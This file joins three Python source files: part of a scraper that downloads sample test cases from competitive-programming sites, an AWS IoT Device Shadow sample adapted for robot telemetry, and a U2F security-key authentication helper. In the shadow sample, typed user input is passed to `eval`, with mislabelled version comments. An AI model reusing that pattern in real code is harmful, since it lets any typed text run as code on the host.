threading.Lock() def get_problem_name(self, response): return response.url.split('/')[-1] def build_problem_url(self): raise NotImplementedError def parse_html(self): raise NotImplementedError def scrape_problem(self): """ Method to scrape a single problem """ contest = '' if self.site == 'spoj' else self.contest print('Fetching problem %s-%s from %s...' % (contest, self.problem, self.site)) req = Utilities.get_html(self.build_problem_url()) inputs, outputs = self.parse_html(req) Utilities.store_files(self.site, self.contest, self.problem, inputs, outputs) print('Done.') def fetch_html(self, link): r = rq.get(link) with self.lock: self.responses += [r] def handle_batch_requests(self, links): """ Method to send simultaneous requests to all problem pages """ threads = [threading.Thread(target=self.fetch_html, args=(link,)) for link in links] for t in threads: t.start() for t in threads: t.join() failed_requests = [] for response in self.responses: if response is not None and response.status_code == 200: inputs, outputs = self.parse_html(response) self.problem = self.get_problem_name(response) Utilities.check_cache(self.site, self.contest, self.problem) Utilities.store_files( self.site, self.contest, self.problem, inputs, outputs) else: failed_requests += [response.url] return failed_requests def scrape_contest(self): """ Method to scrape all problems from a given contest """ print('Checking problems available for contest %s-%s...' % (self.site, self.contest)) req = Utilities.get_html(self.build_contest_url()) links = self.get_problem_links(req) print('Found %d problems..' 
% (len(links))) if not self.force_download: cached_problems = os.listdir(os.path.join( Utilities.cache_dir, self.site, self.contest)) links = [link for link in links if link.split( '/')[-1] not in cached_problems] failed_requests = self.handle_batch_requests(links) if len(failed_requests) > 0: self.handle_batch_requests(failed_requests) class Codeforces(Platform): """ Class to handle downloading of test cases from Codeforces """ def __init__(self, args): self.problem = args['problem'] super(Codeforces, self).__init__(args) def parse_html(self, req): """ Method to parse the html and get test cases from a codeforces problem """ soup = bs(req.text, 'html.parser') inputs = soup.findAll('div', {'class': 'input'}) outputs = soup.findAll('div', {'class': 'output'}) if len(inputs) == 0 or len(outputs) == 0: print('Problem not found..') Utilities.handle_kbd_interrupt( self.site, self.contest, self.problem) sys.exit(0) repls = ('<br>', '\n'), ('<br/>', '\n'), ('</br>', '') formatted_inputs, formatted_outputs = [], [] for inp in inputs: pre = inp.find('pre').decode_contents() pre = functools.reduce(lambda a, kv: a.replace(*kv), repls, pre) pre = re.sub('<[^<]+?>', '', pre) formatted_inputs += [pre] for out in outputs: pre = out.find('pre').decode_contents() pre = functools.reduce(lambda a, kv: a.replace(*kv), repls, pre) pre = re.sub('<[^<]+?>', '', pre) formatted_outputs += [pre] # print 'Inputs', formatted_inputs # print 'Outputs', formatted_outputs return formatted_inputs, formatted_outputs def get_problem_links(self, req): """ Method to get the links for the problems in a given codeforces contest """ soup = bs(req.text, 'html.parser') table = soup.find('table', {'class': 'problems'}) if table is None: print('Contest not found..') Utilities.handle_kbd_interrupt( self.site, self.contest, self.problem) sys.exit(0) links = ['http://codeforces.com' + td.find('a')['href'] for td in table.findAll('td', {'class': 'id'})] return links def build_problem_url(self): contest_type = 'contest' if int(self.contest) <= 100000 else 'gym' return 'http://codeforces.com/%s/%s/problem/%s' % (contest_type, self.contest, self.problem) def build_contest_url(self): contest_type = 'contest' if int(self.contest) <= 100000 else 'gym' return 'http://codeforces.com/%s/%s' % (contest_type, self.contest) class Codechef(Platform): """ Class to handle downloading of test cases from Codechef """ def __init__(self, args): self.problem = args['problem'] super(Codechef, self).__init__(args) def _extract(self, data, marker): data_low = data.lower() extracts = [] idx = data_low.find(marker, 0) while not idx == -1: start = data_low.find('```', idx) end = data_low.find('```', start + 3) extracts += [data[start + 3:end]] idx = data_low.find(marker, end) return [extract.strip() for extract in extracts] def parse_html(self, req): """ Method to parse the html and get test cases from a codechef problem """ try: data = str(json.loads(req.text)['body']) except (KeyError, ValueError): print('Problem not found..') Utilities.handle_kbd_interrupt( self.site, self.contest, self.problem) sys.exit(0) inputs = self._extract(data, 'example input') outputs = self._extract(data, 'example output') return inputs, outputs def get_problem_links(self, req): """ Method to get the links for the problems in a given codechef contest """ soup = bs(req.text, 'html.parser') table = soup.find('table', {'class': 'dataTable'}) if table is None: print('Contest not found..') Utilities.handle_kbd_interrupt( self.site, self.contest, self.problem) sys.exit(0) links = 
[div.find('a')['href'] for div in table.findAll('div', {'class': 'problemname'})] links = ['https://codechef.com/api/contests/' + self.contest + '/problems/' + link.split('/')[-1] for link in links] return links def build_problem_url(self): return 'https://codechef.com/api/contests/%s/problems/%s' % (self.contest, self.problem) def build_contest_url(self): return 'https://codechef.com/%s' % self.contest class Spoj(Platform): """ Class to handle downloading of test cases from Spoj """ def __init__(self, args): self.problem = args['problem'].upper() super(Spoj, self).__init__(args) def parse_html(self, req): """ Method to parse the html and get test cases from a spoj problem """ soup = bs(req.text, 'html.parser') test_cases = soup.findAll('pre') if test_cases is None or len(test_cases) == 0: print('Problem not found..') Utilities.handle_kbd_interrupt( self.site, self.contest, self.problem) sys.exit(0) formatted_inputs, formatted_outputs = [], [] input_list = [ '<pre>(.|\n|\r)*<b>Input:?</b>:?', '<b>Output:?</b>(.|\n|\r)*' ] output_list = [ '<pre>(.|\n|\r)*<b>Output:?</b>:?', '</pre>' ] input_regex = re.compile('(%s)' % '|'.join(input_list)) output_regex = re.compile('(%s)' % '|'.join(output_list)) for case in test_cases: inp = input_regex.sub('', str(case)) out = output_regex.sub('', str(case)) inp = re.sub('<[^<]+?>', '', inp) out = re.sub('<[^<]+?>', '', out) formatted_inputs += [inp.strip()] formatted_outputs += [out.strip()] # print 'Inputs', formatted_inputs # print 'Outputs', formatted_outputs return formatted_inputs, formatted_outputs def build_problem_url(self): return 'http://spoj.com/problems/%s' % self.problem class Hackerrank(Platform): """ Class to handle downloading of test cases from Hackerrank """ def __init__(self, args): self.problem = '-'.join(args['problem'].split() ).lower() if args['problem'] is not None else None super(Hackerrank, self).__init__(args) def parse_html(self, req): """ Method to parse the html and get test cases from a hackerrank problem """ try: data = json.loads(req.text) soup = bs(data['model']['body_html'], 'html.parser') except (KeyError, ValueError): print('Problem not found..') Utilities.handle_kbd_interrupt( self.site, self.contest, self.problem) sys.exit(0) input_divs = soup.findAll('div', {'class': 'challenge_sample_input'}) output_divs = soup.findAll('div', {'class': 'challenge_sample_output'}) inputs = [input_div.find('pre') for input_div in input_divs] outputs = [output_div.find('pre') for output_div in output_divs] regex_list = [ '<pre>(<code>)?', '(</code>)?</pre>' ] regex = re.compile('(%s)' % '|'.join(regex_list)) formatted_inputs, formatted_outputs = [], [] for inp in inputs: spans = inp.findAll('span') if len(spans) > 0: formatted_input = '\n'.join( [span.decode_contents() for span in spans]) else: formatted_input = regex.sub('', str(inp)) formatted_inputs += [formatted_input.strip()] for out in outputs: spans = out.findAll('span') if len(spans) > 0: formatted_output = '\n'.join( [span.decode_contents() for span in spans]) else: formatted_output = regex.sub('', str(out)) formatted_outputs += [formatted_output.strip()] # print 'Inputs', formatted_inputs # print 'Outputs', formatted_outputs return formatted_inputs, formatted_outputs def get_problem_links(self, req): """ Method to get the links for the problems in a given hackerrank contest """ try: data = json.loads(req.text) data = data['models'] except (KeyError, ValueError): print('Contest not found..') Utilities.handle_kbd_interrupt( self.site, self.contest, self.problem) sys.exit(0) 
        links = ['https://www.hackerrank.com/rest/contests/' + self.contest +
                 '/challenges/' + problem['slug'] for problem in data]

        return links

    def build_problem_url(self):
        return 'https://www.hackerrank.com/rest/contests/%s/challenges/%s' % (self.contest, self.problem)

    def build_contest_url(self):
        return 'https://www.hackerrank.com/rest/contests/%s/challenges' % self.contest


class AtCoder(Platform):
    """ Class to handle downloading of test cases from atcoder """

    def __init__(self, args):
        self.problem = args['problem']
        super(AtCoder, self).__init__(args)

    def parse_html(self, req):
        """
        Method to parse the html and get test cases from an atcoder problem
        """
        soup = bs(req.text, 'html.parser')

        inouts = soup.findAll('div', {'class': 'part'})

        repls = ('<br>', '\n'), ('<br/>', '\n'), ('</br>', '')

        formatted_inputs, formatted_outputs = [], []

        inouts = filter(
            (lambda x: x.find('section') and x.find('section').find('h3')), inouts)

        for inp in inouts:
            if inp.find('section').find('h3').text[:3] == "入力例":
                pre = inp.find('pre').decode_contents()
                pre = functools.reduce(lambda a, kv: a.replace(*kv), repls, pre)
                pre = re.sub('<[^<]+?>', '', pre)
                pre = pre.replace("&amp;", "&")
                pre = pre.replace("&lt;", "<")
                pre = pre.replace("&gt;", ">")
                formatted_inputs += [pre]
            if inp.find('section').find('h3').text[:3] == "出力例":
                pre = inp.find('pre').decode_contents()
                pre = functools.reduce(lambda a, kv: a.replace(*kv), repls, pre)
                pre = re.sub('<[^<]+?>', '', pre)
                pre = pre.replace("&amp;", "&")
                pre = pre.replace("&lt;", "<")
                pre = pre.replace("&gt;", ">")
                formatted_outputs += [pre]

        return formatted_inputs, formatted_outputs

    def get_problem_links(self, req):
        """
        Method to get the links for the problems in a given atcoder contest
        """
        soup = bs(req.text, 'html.parser')

        table = soup.find('tbody')

        if table is None:
            print('Contest not found..')
            Utilities.handle_kbd_interrupt(
                self.site, self.contest, self.problem)
            sys.exit(0)

        links = ['http://beta.atcoder.jp' + td.find('a')['href']
                 for td in soup.findAll('td', {'class': 'text-center no-break'})]

        return links

    def get_problem_name(self, response):
        """
        Method to get the names for the problems in a given atcoder contest
        """
        soup = bs(response.text, 'html.parser')
        return soup.find('title').get_text()[0].lower()

    def build_problem_url(self):
        return 'https://beta.atcoder.jp/contests/%s/tasks/%s' % (self.contest, self.problem)

    def build_contest_url(self):
        return 'https://beta.atcoder.jp/contests/%s/tasks/' % self.contest
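
# Illustrative usage sketch (an assumption; the real CLI entry point lives
# elsewhere in the package): wiring the flag parser to the download helpers
# defined above.
if __name__ == '__main__':
    supported_sites = ['codeforces', 'codechef', 'spoj', 'hackerrank', 'atcoder']
    flags = Utilities.parse_flags(supported_sites)
    try:
        if flags['problem'] is not None:
            Utilities.download_problem_testcases(flags)
        elif flags['contest'] is not None:
            Utilities.download_contest_testcases(flags)
    except KeyboardInterrupt:
        Utilities.handle_kbd_interrupt(
            flags['site'], flags['contest'], flags['problem'])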
shadow.py
#!/usr/bin/env python # 2020 March 1 - modified and adapted for robot by Tal G. Ball, # Maintaining Apache License, Version 2 and Amazon's Copyright Notice # Copyright 2010-2018 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). # You may not use this file except in compliance with the License. # A copy of the License is located at # # http://aws.amazon.com/apache2.0 # # or in the "license" file accompanying this file. This file is distributed # on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either # express or implied. See the License for the specific language governing # permissions and limitations under the License. import argparse from awscrt import auth, io, mqtt, http from awsiot import iotshadow from awsiot import mqtt_connection_builder from concurrent.futures import Future import sys import threading import multiprocessing import traceback import time import queue import logging # - Overview - # This sample uses the AWS IoT Device Shadow Service to keep a property in # sync between device and server. Imagine a light whose color may be changed # through an app, or set by a local user. # # - Instructions - # Once connected, type a value in the terminal and press Enter to update # the property's "reported" value. The sample also responds when the "desired" # value changes on the server. To observe this, edit the Shadow document in # the AWS Console and set a new "desired" value. # # - Detail - # On startup, the sample requests the shadow document to learn the property's # initial state. The sample also subscribes to "delta" events from the server, # which are sent when a property's "desired" value differs from its "reported" # value. When the sample learns of a new desired value, that value is changed # on the device and an update is sent to the server with the new "reported" # value. parser = argparse.ArgumentParser(description="Device Shadow sample keeps a property in sync across client and server") parser.add_argument('--endpoint', required=True, help="Your AWS IoT custom endpoint, not including a port. " + "Ex: \"w6zbse3vjd5b4p-ats.iot.us-west-2.amazonaws.com\"") parser.add_argument('--cert', help="File path to your client certificate, in PEM format") parser.add_argument('--key', help="File path to your private key file, in PEM format") parser.add_argument('--root-ca', help="File path to root certificate authority, in PEM format. " + "Necessary if MQTT server uses a certificate that's not already in " + "your trust store") parser.add_argument('--client-id', default='samples-client-id', help="Client ID for MQTT connection.") parser.add_argument('--thing-name', required=True, help="The name assigned to your IoT Thing") parser.add_argument('--shadow-property', default="telemetry", help="Name of property in shadow to keep in sync") parser.add_argument('--use-websocket', default=False, action='store_true', help="To use a websocket instead of raw mqtt. If you " + "specify this option you must specify a region for signing, you can also enable proxy mode.") parser.add_argument('--signing-region', default='us-east-1', help="If you specify --use-web-socket, this " + "is the region that will be used for computing the Sigv4 signature") parser.add_argument('--proxy-host', help="Hostname for proxy to connect to. 
Note: if you use this feature, " + "you will likely need to set --root-ca to the ca for your proxy.") parser.add_argument('--proxy-port', type=int, default=8080, help="Port for proxy to connect to.") parser.add_argument('--verbosity', choices=[x.name for x in io.LogLevel], default=io.LogLevel.NoLogs.name, help='Logging level') parser.add_argument('--robot-url', required=True, help="Robot url for retrieving the telemetry") parser.add_argument('--robot-ca', required=True, help="Root certificate for robot telemetry") # Tal G. Ball - heavily reorganizing to support multiprocessing proc_name = multiprocessing.current_process().name # print("Process Name in shadow is %s" % proc_name) SHADOW_VALUE_DEFAULT = "off" class LockedData(object): def __init__(self): self.lock = threading.Lock() self.shadow_value = None self.disconnect_called = False self.stop = False class ShadowOps(object): def __init__(self, args, shadow_command_q): self.args = args self.shadow_command_q = shadow_command_q print("Initializing shadow operations") logging.info("Initializing shadow operations") if not args.verbosity: args.verbosity = io.LogLevel.NoLogs.name io.init_logging(getattr(io.LogLevel, args.verbosity), 'stderr') print("Set aws logging to %s" % args.verbosity) logging.info("Set aws logging to %s" % args.verbosity) self.mqtt_connection = None self.shadow_client = None self.robot_client = args.robot_client self.thing_name = args.thing_name self.shadow_property = args.shadow_property self.telemetry_thread = None self.is_sample_done = threading.Event() self.locked_data = LockedData() self.shadow_command_thread = threading.Thread(target=self.wait_to_end_shadow, name="Shadow Command Thread") logging.debug("Starting Shadow Command Thread") self.shadow_command_thread.start() # logging.debug("Starting Shadow Operations Main") self.main(self.args) # Function for gracefully quitting this sample def exit(self, msg_or_exception): if isinstance(msg_or_exception, Exception): logging.debug("Exiting sample due to exception.") traceback.print_exception(msg_or_exception.__class__, msg_or_exception, sys.exc_info()[2]) else: logging.debug("Exiting sample:", msg_or_exception) with self.locked_data.lock: if not self.locked_data.disconnect_called: print("Disconnecting...") logging.info("Disconnecting...") self.locked_data.disconnect_called = True future = self.mqtt_connection.disconnect() future.add_done_callback(self.on_disconnected) self.args.robot_client.post("Shutdown") def on_disconnected(self, disconnect_future): # type: (Future) -> None print("Disconnected.") logging.debug("Disconnected.") # Signal that sample is finished self.is_sample_done.set() def on_get_shadow_accepted(self, response): # type: (iotshadow.GetShadowResponse) -> None try: # logging.debug("Finished getting initial shadow state.") with self.locked_data.lock: if self.locked_data.shadow_value is not None: # logging.debug(" Ignoring initial query because a delta event has already been received.") return if response.state: if response.state.delta: value = response.state.delta.get(self.shadow_property) if value: logging.debug(" Shadow contains delta value '{}'.".format(value)) self.change_shadow_value(value) return if response.state.reported: value = response.state.reported.get(self.shadow_property) if value: logging.debug(" Shadow contains reported value '{}'.".format(value)) self.set_local_value_due_to_initial_query(response.state.reported[self.shadow_property]) return logging.debug(" Shadow document lacks '{}' property. 
Setting defaults...".format(self.shadow_property)) self.change_shadow_value(SHADOW_VALUE_DEFAULT) return except Exception as e: self.exit(e) def on_get_shadow_rejected(self, error): # type: (iotshadow.ErrorResponse) -> None if error.code == 404: logging.debug("Thing has no shadow document. Creating with defaults...") self.change_shadow_value(SHADOW_VALUE_DEFAULT) else: self.exit("Get request was rejected. code:{} message:'{}'".format( error.code, error.message)) def on_shadow_delta_updated(self, delta): # type: (iotshadow.ShadowDeltaUpdatedEvent) -> None try: logging.debug("Received shadow delta event.") if delta.state and (self.shadow_property in delta.state): value = delta.state[self.shadow_property] if value is None: logging.debug(" Delta reports that '{}' was deleted. Resetting defaults...".format(self.shadow_property)) self.change_shadow_value(SHADOW_VALUE_DEFAULT) return else: logging.debug(" Delta reports that desired value is '{}'. Changing local value...".format(value)) self.change_shadow_value(value) else: logging.debug(" Delta did not report a change in '{}'".format(self.shadow_property)) except Exception as e: self.exit(e) def on_publish_update_shadow(self, future): #type: (Future) -> None try: future.result() logging.debug("Update request published.") except Exception as e: logging.debug("Failed to publish update request.") self.exit(e) def on_update_shadow_accepted(self, response): # type: (iotshadow.UpdateShadowResponse) -> None try: logging.debug("Finished updating reported shadow value to '{}'.".format(response.state.reported[self.shadow_property])) # type: ignore # print("Enter desired value: ") # remind user they can input new values except: self.exit("Updated shadow is missing the target property.") def on_update_shadow_rejected(self, error): # type: (iotshadow.ErrorResponse) -> None self.exit("Update request was rejected. code:{} message:'{}'".format( error.code, error.message)) def set_local_value_due_to_initial_query(self, reported_value): with self.locked_data.lock: self.locked_data.shadow_value = reported_value # print("Enter desired value: ") # remind user they can input new values def change_shadow_value(self,value): with self.locked_data.lock: if self.locked_data.shadow_value == value: logging.debug("Local value is already '{}'.".format(value)) # print("Enter desired value: ") # remind user they can input new values return logging.debug("Changed local shadow value to '{}'.".format(value)) self.locked_data.shadow_value = value logging.debug("Updating reported shadow value to '{}'...".format(value)) request = iotshadow.UpdateShadowRequest( thing_name=self.thing_name, state=iotshadow.ShadowState( reported={ self.shadow_property: value }, desired={ self.shadow_property: value }, ) ) future = self.shadow_client.publish_update_shadow(request, mqtt.QoS.AT_LEAST_ONCE) future.add_done_callback(self.on_publish_update_shadow) def user_input_thread_fn(self): while True: try: # Read user input try: new_value = input() # python 2 only except NameError: new_value = eval(input()) # python 3 only # If user wants to quit sample, then quit. # Otherwise change the shadow value. 
if new_value in ['exit', 'quit']: self.exit("User has quit") break else: self.change_shadow_value(new_value) except Exception as e: logging.debug("Exception on input thread.") self.exit(e) break def get_robot_telemetry(self, robot_url=None, ca=None): while True: if self.locked_data.stop == True: # print("Calling exit from telemetry thread") # print("Live Threads:\n\t") # print("%s" % threading.enumerate()) self.exit('Shutting down shadow updates') break try: response = self.robot_client.get() if response: self.change_shadow_value(response[0]) except Exception as e: logging.debug("Exception on getting telemetry") self.exit(e) break time.sleep(5.0) def wait_to_end_shadow(self): # print("Patiently waiting to end shadow operations") while True: task = self.shadow_command_q.get() if task == "Shutdown": with self.locked_data.lock: self.locked_data.stop = True # logging.debug("Shadow stop signaled") self.shadow_command_q.task_done() break else: self.shadow_command_q.task_done() return def main(self, args): # logging.debug("Spinning up Shadow awsiot resources") event_loop_group = io.EventLoopGroup(1) host_resolver = io.DefaultHostResolver(event_loop_group) client_bootstrap = io.ClientBootstrap(event_loop_group, host_resolver) # logging.debug("Shadow resources up") if args.use_websocket == True: proxy_options = None if (args.proxy_host): proxy_options = http.HttpProxyOptions(host_name=args.proxy_host, port=args.proxy_port) credentials_provider = auth.AwsCredentialsProvider.new_default_chain(client_bootstrap) self.mqtt_connection = mqtt_connection_builder.websockets_with_default_aws_signing( endpoint=args.endpoint, client_bootstrap=client_bootstrap, region=args.signing_region, credentials_provider=credentials_provider, websocket_proxy_options=proxy_options, ca_filepath=args.root_ca, client_id=args.client_id, clean_session=False, keep_alive_secs=6) else: # attrs = vars(args) # print(', '.join("%s: %s" % item for item in list(attrs.items()))) self.mqtt_connection = mqtt_connection_builder.mtls_from_path( endpoint=args.endpoint, cert_filepath=args.cert, pri_key_filepath=args.key, client_bootstrap=client_bootstrap, ca_filepath=args.root_ca, client_id=args.client_id, clean_session=False, keep_alive_secs=6) print("Connecting to {} with client ID '{}'...".format( args.endpoint, args.client_id)) logging.debug("Connecting to {} with client ID '{}'...".format( args.endpoint, args.client_id)) connected_future = self.mqtt_connection.connect() self.shadow_client = iotshadow.IotShadowClient(self.mqtt_connection) # Wait for connection to be fully established. # Note that it's not necessary to wait, commands issued to the # mqtt_connection before its fully connected will simply be queued. # But this sample waits here so it's obvious when a connection # fails or succeeds. connected_future.result() print("Connected!") logging.debug("Connected!") try: # Subscribe to necessary topics. # Note that is **is** important to wait for "accepted/rejected" subscriptions # to succeed before publishing the corresponding "request". 
# print("Subscribing to Delta events...") delta_subscribed_future, _ = self.shadow_client.subscribe_to_shadow_delta_updated_events( request=iotshadow.ShadowDeltaUpdatedSubscriptionRequest(args.thing_name), qos=mqtt.QoS.AT_LEAST_ONCE, callback=self.on_shadow_delta_updated) # Wait for subscription to succeed delta_subscribed_future.result() # print("Subscribing to Update responses...") update_accepted_subscribed_future, _ = self.shadow_client.subscribe_to_update_shadow_accepted( request=iotshadow.UpdateShadowSubscriptionRequest(args.thing_name), qos=mqtt.QoS.AT_LEAST_ONCE, callback=self.on_update_shadow_accepted) update_rejected_subscribed_future, _ = self.shadow_client.subscribe_to_update_shadow_rejected( request=iotshadow.UpdateShadowSubscriptionRequest(args.thing_name), qos=mqtt.QoS.AT_LEAST_ONCE, callback=self.on_update_shadow_rejected) # Wait for subscriptions to succeed update_accepted_subscribed_future.result() update_rejected_subscribed_future.result() # print("Subscribing to Get responses...") get_accepted_subscribed_future, _ = self.shadow_client.subscribe_to_get_shadow_accepted( request=iotshadow.GetShadowSubscriptionRequest(args.thing_name), qos=mqtt.QoS.AT_LEAST_ONCE, callback=self.on_get_shadow_accepted) get_rejected_subscribed_future, _ = self.shadow_client.subscribe_to_get_shadow_rejected( request=iotshadow.GetShadowSubscriptionRequest(args.thing_name), qos=mqtt.QoS.AT_LEAST_ONCE, callback=self.on_get_shadow_rejected) # Wait for subscriptions to succeed get_accepted_subscribed_future.result() get_rejected_subscribed_future.result() # The rest of the sample runs asyncronously. # Issue request for shadow's current state. # The response will be received by the on_get_accepted() callback # print("Requesting current shadow state...") publish_get_future = self.shadow_client.publish_get_shadow( request=iotshadow.GetShadowRequest(args.thing_name), qos=mqtt.QoS.AT_LEAST_ONCE) # Ensure that publish succeeds publish_get_future.result() # Launch thread to handle user input. # A "daemon" thread won't prevent the program from shutting down. # print("Launching thread to read user input...") # user_input_thread = threading.Thread(target=user_input_thread_fn, name='user_input_thread') # user_input_thread.daemon = True # user_input_thread.start() # Launch thread to send telemetry updates to shadow self.telemetry_thread = threading.Thread( target=self.get_robot_telemetry, name='Robot Telemetry Thread', args=(args.robot_url, args.robot_ca) ) # self.telemetry_thread.daemon = True self.telemetry_thread.start() except Exception as e: self.exit(e) # Wait for the sample to finish (user types 'quit', or an error occurs) self.is_sample_done.wait() if __name__ == '__main__': # Process input args args = parser.parse_args() sq = queue.Queue() s = ShadowOps(args, sq)
u2f.py
""" Copyright 2018-present SYNETIS. Licensed under the Apache License, Version 2.0 (the "License"); You may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and* limitations under the License.* """ from __future__ import print_function, absolute_import, unicode_literals import base64 import json import time from threading import Event, Thread from fido2.ctap1 import APDU from fido2.ctap1 import ApduError from fido2.ctap1 import CTAP1 from fido2.hid import CtapHidDevice from fido2.utils import sha256 from gimme_aws_creds.errors import NoFIDODeviceFoundError, FIDODeviceTimeoutError, FIDODeviceError class FactorU2F(object): def __init__(self, ui, appId, nonce, credentialId): """ :param appId: Base URL string for Okta IDP e.g. https://xxxx.okta.com' :param nonce: nonce :param credentialid: credentialid """ self.ui = ui self._clients = None self._has_prompted = False self._cancel = Event() self._credentialId = base64.urlsafe_b64decode(credentialId) self._appId = sha256(appId.encode()) self._version = 'U2F_V2' self._signature = None self._clientData = json.dumps({ "challenge": nonce, "origin": appId, "typ": "navigator.id.getAssertion" }).encode() self._nonce = sha256(self._clientData) def locate_device(self): # Locate a device devs = list(CtapHidDevice.list_devices()) if not devs: self.ui.info("No FIDO device found") raise NoFIDODeviceFoundError self._clients = [CTAP1(d) for d in devs] def work(self, client): for _ in range(30): try: self._signature = client.authenticate( self._nonce, self._appId, self._credentialId ) except ApduError as e: if e.code == APDU.USE_NOT_SATISFIED: if not self._has_prompted: self.ui.info('\nTouch your authenticator device now...\n') self._has_prompted = True time.sleep(0.5) continue else: raise FIDODeviceError break if self._signature is None: raise FIDODeviceError self._cancel.set() def verify(self): # If authenticator is not found, prompt try: self.locate_device() except NoFIDODeviceFoundError: self.ui.input('Please insert your security key and press enter...') self.locate_device() threads = [] for client in self._clients: t = Thread(target=self.work, args=(client,)) threads.append(t) t.start() for t in threads: t.join() if not self._cancel.is_set(): self.ui.info('Operation timed out or no valid Security Key found !') raise FIDODeviceTimeoutError return self._clientData, self._signature